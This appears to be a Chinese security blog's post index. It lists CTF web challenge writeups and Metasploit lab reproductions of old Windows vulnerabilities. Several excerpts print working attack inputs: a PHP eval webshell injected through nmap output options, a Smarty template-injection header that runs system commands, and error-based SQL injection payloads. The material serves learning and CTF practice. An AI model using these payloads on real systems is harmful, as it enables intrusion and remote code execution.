- 博客(125)
- 资源 (1)
- 收藏
- 关注
原创 PHP伪随机数漏洞,以及php_mt_seed脚本的使用
目录mt_rand()存在的问题例:[GWCTF 2019]抽奖使用php_mt_seed4.0工具爆破seed函数 mt_srand() mt_rand() mt_srand(seed)函数通过分发seed种子,依靠mt_rand()使用 Mersenne Twister算法返回随机整数漏洞构造代码如下<?php mt_srand(123); echo mt_rand();?> 而如果重新构造一次,将生成的随机数多.
2021-12-04 14:10:04 5335 2
原创 关于使用IE浏览特制网页时允许远程执行代码漏洞(MS10-018)的复现
攻击机:kali靶机:windows xp sp2使用metasploit框架,需要启用metasploit所依赖的postgresql数据库在kali上启动postgresql命令【systemctl start postgresql】如果想查看postgresql是否开启可以使用【systemctl status postgresql】,这里显示active表示已经打开启动msfconsole搜索相应的模块这里有两个可利用的并且加载第一个模块,show opt.
2021-11-30 12:40:46 6940 3
原创 [MRCTF2020]三关套娃writeup
考点 PHP解析字符串特性 PHP弱类型绕过 jother编码解码 Client-ip伪造ip data://伪协议 change函数 第一关<!--//1st$query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE
2021-11-28 18:03:48 2908
原创 [BJDCTF2020]EasySearch之SSI注入
开启靶机,题目提示easysearch,应该不是考SQL注入类型的题,然后利用御剑扫出了隐藏文件/index.php.swp,这个文件是一个临时交换文件,用来备份缓冲区中的内容。如果文件正常退出,则自动删除此文件访问获得源码<?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'..
2021-11-24 19:54:10 2473 1
原创 [NPUCTF2020]ReadlezPHP与assert函数利用
在URL前添加view-source:即可查看源码 点击/time.php?source跳转如下页面创建一个HelloPhp类和两个变量$a和$b,将a初始赋值"Y-m-d h:i:s",b初始赋值"date",最后输出$b($a),显然b括号包含a,如果将b赋值为函数,a赋值为命令,是否可以执行需要的命令呢?如果以get方式提交source则终止程序,以get方式提交的data则反序列化data,所以我们需要传入序列化后的值执行我们需要的命令我们将a更改为phpinfo(),b更改为...
2021-11-23 12:38:58 3034
原创 [MRCTF2020]Ezpop
pop链的利用多种魔术方法的了解__wakeup() //使用unserialize时触发__get() //用于从不可访问的属性读取数据__toString() //把类当作字符串使用时触发__invoke() //当脚本尝试将对象调用为函数时触发直接给出如下源码,先提示我们flag在flag.php下:Welcome to index.php<?php//flag is in flag.php//WTF IS THIS?//Learn From https://
2021-11-21 23:14:14 2344
原创 MS11-003在Internet Explorer中存在允许远程代码执行漏洞复现
漏洞描述利用IE(包含IE6、IE7、IE8)对CSS的解析存在的一个问题,使得任何访问包含非法CSS的页面导致IE奔溃重启,也就是说攻击者只需让用户访问一个特制的网页或者加载了一个非法的CSS的网页时,便可以获得与本地用户相同的权限受影响的系统 Windows XP SP 2 Windows XP SP 3 Windows Vista SP 1 Windows Vista SP 2 Windows Server 2008 Windows Se
2021-11-14 00:30:00 2876
原创 [网鼎杯 2020 朱雀组]Nmap
这道题与[BUUCTF 2018]Online Tool的解题方式一些有些类似,都是利用nmap上传文件连接,主要考察nmap的一些用法首先右击查看源码,提示flag在/flag下 进行简单的ping操作nmap下的选项 -oN 标准保存 -oX XML保存 -oG Grep保存 -oA 所有格式保存 构造payload:' <?php @eval($_POST["hack"]);?> -oG hack.php 'php被.
2021-11-12 13:33:19 2784
原创 MS12-020远程桌面协议RDP代码执行导致系统蓝屏漏洞(CVE-2012-0002)
漏洞描述源于没有正确处理内存中的数据包导致的CVE-2012-0002漏洞,远程攻击者在未经认证的情况下往服务器发送特制的RDP报文,来访问未初始化或未删除的对象来触发漏洞,即可执行系统权限或者NET SERVICE权限任意命令,并以管理员权限查看、更改、删除数据受影响的系统 Microsoft Windows XP Microsoft Windows Vista Microsoft Windows Server 2003 Microsoft Windows Se
2021-11-10 13:16:54 10109
原创 WEB—无列名注入与过滤information_schema
一开始由于注册admin的时候,告知用户已被注册,以为需要爆破admin密码,失败后尝试万能密码,发现也不行。。。注册新用户后又对广告的xss研究半天,虽然怀疑过SQL,后来没想到真的是SQL注入知识点 无列名注入 过滤information_schema 随便注册一个账户登录,进去后可以发布广告【千万不要写入一个xss,弹来弹去,盲猜你们会尝试】发布一个广告名为:1',内容随意 点击广告详情,弹出关键报错信息,数据库为MariaDB继续注入,发布一个广告名为:.
2021-11-09 15:27:45 2693
原创 Metasploit工作区与扫描
为了区分不同的扫描任务,Metasploit提供了工作区以区分不同的任务之间的信息相互独立,避免混淆数据。Matesploit内的workspace来管理工作区,语法格式如下:workspace [options] 空选项:列出所有工作区 -v:显示工作区详细信息 name:切换至建立的name工作区 -a [name]:新建名称为name的工作区 -d [name]:删除名称为name的工作区 -D:删除所有除默认工作区以外的工作区 -
2021-11-09 15:09:26 2516
原创 MS10-046文件快捷方式漏洞复现与利用
攻击机:kali靶机:windows xp sp2使用metasploit框架,需要启用metasploit所依赖的postgresql数据库在kali上启动postgresql命令【systemctl start postgresql】如果想查看postgresql是否开启可以使用【systemctl status postgresql】,这里显示active表示已经打开启动msfconsole搜索ms10-046相应的模块这里有两个可利用的模块,browser.
2021-11-07 12:02:11 4775
原创 [CISCN 2019 初赛]Love Math
<?phperror_reporting(0);//听说你很喜欢数学,不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){ show_source(__FILE__);}else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $blacklist = [' ', '\t', '\r.
2021-11-04 10:51:08 1447
原创 [WUSTCTF2020]朴实无华wp_弱类型、intval函数使用不当
知识点:intval函数绕过,php弱类型,空格绕过cat绕过题目一打开显示Hack me利用御剑扫出了robots.txt文件进入robots.txt提示进入/fAke_f1agggg.php,结果给出了一个假的flag在响应头内找到关键信息,/fl4g.php 访问之后获得源码:<?phpheader('Content-type:text/html;charset=utf-8');error_reporting(0);highligh
2021-11-03 11:42:06 2713
原创 [安洵杯 2019]easy_serialize_php反序列化对象逃逸
知识点:get与post传参反序列化漏洞反序列化中对象逃逸file_get_contents函数单击sourc_code跳出源码: <?php$function = @$_GET['f'];function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; ret
2021-11-02 11:08:06 3768
原创 Kali与MSF之信息收集
攻击机:linux kali靶机:win10、win7和metasploittable2kali内通过DNS或IP地址收集目标信息1、Whois用来查询域名注册信息数据库的工具,一般的域名注册信息会包含域名所有者、服务商、注册日期等等,这些信息在做渗透攻击之前是很有价值的注:进行whois查询时不能带有www、ftp等前缀,机构在注册域名时通常会注册一个上层域名,其子域名由自身的域名服务器管理,在whois数据库查询失败2、Nslookup(查询指定域名对应的ip地址)n
2021-10-31 12:00:24 5369 1
原创 [BJDCTF2020]Cookie is so stable
服务端模板注入攻击一道非常简单的模板注入,从cookie入手第一次见过,以后忘记了还可以捡起来刚开始做的时候,根据题目意思还以为是道传入XSS获取cookie的题,测试无果后看了一眼wp,发现其实是个存在于饼干的SSTIhint.php源码页面也给出了对应的提示首先在输入框输入admin,burp抓包再次刷新当前登录的页面可以看见,在cookie尾部新多了一个user=admin,测试是否是注入点输入{{7*'7'}},返回49可以判断为 Twig 模块输入{{7
2021-10-30 11:05:45 637
原创 XML、XXE注入与CTF下的XXE
在学习XXE漏洞之前,首先一起学习一下什么是XMLXML是什么?是种可扩展标记语言,本质上被设计用来传输、存储数据以及结构化,而非显示数据,可以简单理解为不能做任何事的纯文本常见的XML结构如下:<?xml version="1.0" encoding="utf-8"?>#XML声明<!DOCTYPE note [<!ELEMENT note (to,from,heading,body)><!ELEMENT to (#PCDATA)>&
2021-10-27 23:32:20 1652
原创 跨站脚本攻击(XSS)复现与防范、上海交通大学反射型与存储型xss案例
目录xss漏洞介绍XSS是什么XSS漏洞原理反射型XSS攻击复现存储型XSS攻击复现DOM型XSS攻击复现常用的XSS测试语句关于XSS的防御xss漏洞介绍跨站脚本攻击,英文全称是Cross Site Scripting,为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS攻击,通常指的是攻击者通过“HTML注入”篡改网页,插入恶意脚本,代码注入的一种攻击手段,当其他用户浏览网页时就会受影响
2021-10-24 12:39:27 7395 14
原创 [网鼎杯 2020 朱雀组]之phpweb两种不同的解题方式
目录方法一:方法二:知识点:1)黑名单取巧绕过2)PHP的file_get_contents函数使用3)PHP序列化与反序列化构造访问靶机,观察页面,开始时首先加载了一张图片,随后刷新回显时间,并且网页每隔一段时间会刷新一次,频率大概五秒一次F12查看源码,和观察的一样,setTimeout("document.form1.submit()",5000)每隔五秒钟将会提交一次form1,然后是一串时间字符串2021-10-20 12:14:50 pm.
2021-10-21 00:23:15 8498 4
原创 自己收集的一些常见SQL注入方式(持续更新中,增加了无列名注入和Timing Attack注入)
目录注入点位置及发现判断输入点是否存在注入测试数值型:字符型:group_concat注入:union注入:limit注入:报错注入:布尔注入:时间注入:堆查询注入:宽字节注入:base64注入:Cookie注入、Referer注入、UA注入、XFF注入预编译注入:Handler注入(从表名查询字段名):SQL绕过WAF通过SQL语句读写文件注入点位置及发现: GET参数注入 POST参数注入 use.
2021-10-19 19:10:11 2013
原创 [BJDCTF2020]Mark loves cat变量覆盖
首先用dirsearch扫描下目录由于BUUCTF限制发包量,更改扫描线程命令:python dirsearch .py -u [url] -e * -t 3 -s 0.2,扫除/.git泄露得到两个php文件,kali内githack扫出来但是下载失败了flag.php<?php$flag = file_get_contents('/flag');?>index.php<?phpinclude 'flag.php';$yds = ..
2021-10-18 19:24:48 977 1
原创 preg_replace /e模式下代码漏洞
<?phperror_reporting(0);$text = $_GET["text"];//以get方式提交text$file = $_GET["file"];//以get方式提交fileif(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){//file_get_content需要读到一个$text传来的内容为I have a dream的文件 echo "<br>...
2021-10-17 22:35:40 1125 1
原创 [HCTF 2018]admin——Unicode欺骗
一、暴力破解基于表单的暴力破解缺少验证码匹配,无登录次数限制等等条件,可以对用户名或密码暴力破解burp抓包设置target
2021-10-16 22:53:49 1286
原创 Pikachu靶场通过记录
一、暴力破解基于表单的暴力破解缺少验证码匹配,无登录次数限制等等条件,可以对用户名或密码暴力破解burp抓包设置target
2021-10-15 21:07:58 2700
原创 Sqlmap入土详解
Sqlmap注入常用参数参数 作用 -u [url] 扫描指定的URL地址,判断是否存在注入 --dump 存储DBMS数据库的表中条目 --dbs 获取当前用户下所有数据库名称 --users 获取数据库的所有用户 --tables 查询表 --columns 查询字段 -D 指定数据库名 -T 指定表名 -C 指定字段名 其余参数
2021-10-10 21:57:38 1406 2
原创 upload-labs文件上传漏洞(Pass-01~Pass-21)
目录pass-1(js前端绕过)pass-2(MiMe绕过)pass-3(黑名单绕过)pass-04(.htaccess文件上传)pass-05pass-06(大小写绕过)pass-07(空格绕过)pass-08(windows特性加点绕过)pass-09(::$DATA绕过)pass-10(点空点绕过)pass-11(双写绕过)pass-12(GET请求00截断)pass-13(POST请求00截断)pass-14(头文件绕过、图片码绕过、文件包含)
2021-10-09 20:45:39 2949 5
原创 [CVE-2018-12613]我有一个数据库
当我们拿到网站的时候,首先需要对这个网站进行信息收集,扩大漏洞发现的概率,比如whois、指纹识别、扫描目标站点的目录,寻找敏感信息、后台、是否存在备份文件等等,其实靶场也一样,如果觉得麻烦,也可能错过发现一个可利用的漏洞使用御剑目录扫描出两个敏感目录robots.txt与phpmyadmin这里还扫描出了一个文件robots.txt(告知网络搜索引擎),此网站中的哪些内容是应该或者不应该被搜索引擎的漫游器获取的)访问phpmyadmin,注:此处无需密码.
2021-10-09 01:07:48 981
原创 BUUCTF-The mystery of ip【Smarty-SSTI模板注入】
当点击flag的时候,弹出ip地址怀疑需要利用X-Forwarded-For伪造127.0.0.1绕过使用bp抓包,增加X-Forwarded-For:127.0.0.1,重放似乎只是将ip回显?通过XFF头来获取信息的,这个IP的值受XFF头控制 。将XFF头改为{2*2}会发现该位置的值变为了4,便可以确定这里存在SSTIpayload:X-Forwarded-For:127.0.0.1{system("ls")}查看当前目录下的flag.php内是否藏有flag,可..
2021-10-07 22:48:46 1121
原创 无参数RCE
[GXYCTF2019]禁止套娃<?phpinclude "flag.php";//执行并包含flag.phpecho "flag在哪里呢?<br>";if(isset($_GET['exp'])){//以get方式提交exp,非空且为字符串 if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/.
2021-10-02 12:20:42 2135 1
原创 [网鼎杯 2018]Fakebook——SSRF/反序列化漏洞/SQL注入
解法一解法二解法三考点• 目录扫描• SSRF• SQL注入• PHP反序列化前言:当我们拿到网站的时候,首先需要对这个网站进行信息收集,扩大漏洞发现的概率,比如whois、指纹识别、扫描目标站点的目录,寻找敏感信息、后台又或者是否存在备份文件,其实靶场也一样,如果觉得麻烦,也可能错过发现一个可利用的漏洞开始之前,先扫描一下该网站下目录,查看有什么敏感信息泄露直接扫出了flag.php文件,有是有,但是访问后,回显内容为空,当我们确定了一个
2021-09-29 15:13:18 3442 1
原创 [MRCTF2020]Ez_bypass
考点:MD5强碰撞,PHP弱类型右击查看源码include 'flag.php';$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) { echo 'Yo
2021-09-28 19:35:40 1227
原创 HardSQL报错注入
使用fuzz测试,过滤很严重,包括=【用like代替】,空格【用()代替】,union【用or代替】等等都被过滤使用堆注入查询,似乎不行,而且substr也被禁用,尝试使用报错注入updatexml或extractvalue构造查询数据库payloadadmin'or(updatexml(1,concat(0x7e,(select(database())),0x7e),1))#构造查询表payloadadmin'or(updatexml(1,concat(0x7e,..
2021-09-27 14:59:25 1231
原创 password=md5($pass,true)绕过、弱类型、MD5强碰撞
在输入框查询任何内容都返回为空,尝试sql注入无果,用bp抓包select * from 'admin' where password=md5($pass,true)确实执行了我们的查询,但是在通过where时,条件不匹配,导致报错需要password=md5($pass,true)条件为真时,才会执行select * form adminmd5()函数会将我们输入的值,加密,然后转换成16字符的二进制格式,由于ffifdyop被md5加密后的276f722736c95d...
2021-09-27 11:27:51 3772 1
原创 Meterpreter后渗透模块之信息收集
进程迁移防止进程被用户关闭,移动shell1)手动先使用ps查看目标正在运行的进程查看当前进程号meterpreter > getpidCurrent pid: 1104从ps查看的运行进程内找出meterpreter的ipd,可以看到,现在的进程为1104,name为svchost.exe,输入migrate 2844迁移至explorer.exe,因为该进程是一个稳定的应用,然后再使用getpid查看新的进程号meterpreter > mig
2021-09-23 22:04:16 2056 1
原创 Samba服务安全漏洞复现及利用[CVE-2007-2447]
模拟环境:攻击工具:kali Linux/nmap/msfconsole目标:metasploittable2/UNIX一、使用nmap扫描网段内主机命令:【nmap -sS -Pn 192.168.200.134】注:-sS会使nmap执行一次隐秘的TCP扫描,以确定某个特定的TCP端口是否开放,-Pn会告知nmap不执行ping命令预先判断目标是否存活,而是默认主机为存活,也可以尝试使用-A选项MSF内同样也支持nmap扫描,但是这里-sV会进行探测快放端口以及版本信息扫描.
2021-09-22 09:42:23 3475 6
原创 Metasploit辅助模块服务扫描
目录portscan端口扫描Nmap端口扫描SMB系统版本扫描SMB枚举SMB弱口令扫描SSH登录测试Mysql枚举Mysql语句执行Mysql弱口令扫描SMTP版本扫描SMTP枚举Telnet登录VNC空口令扫描portscan端口扫描Nmap端口扫描SMB系统版本扫描SMB枚举SMB弱口令扫描SSH登录测试Mysql枚举设置靶机的上mysql密码,执行shell命令:su
2021-09-21 14:45:05 2051 1
原创 反序列化漏洞——I Hvae A Cat
【因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯不愧是我!!! 】根据题目提示的备份网站,可以使用网站备份文件的字典进行爆破,得到www.zip备份文件 下载后解压里面的class.php、flag.php和index.php文件一开始以为是简单的扫后台路径得到flag,在flag.php提交flag时出错,好吧果然不是这么简单的代码审计其余两个php文件其中index.php<?php include 'class.php'; ..
2021-09-21 00:23:25 1457
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人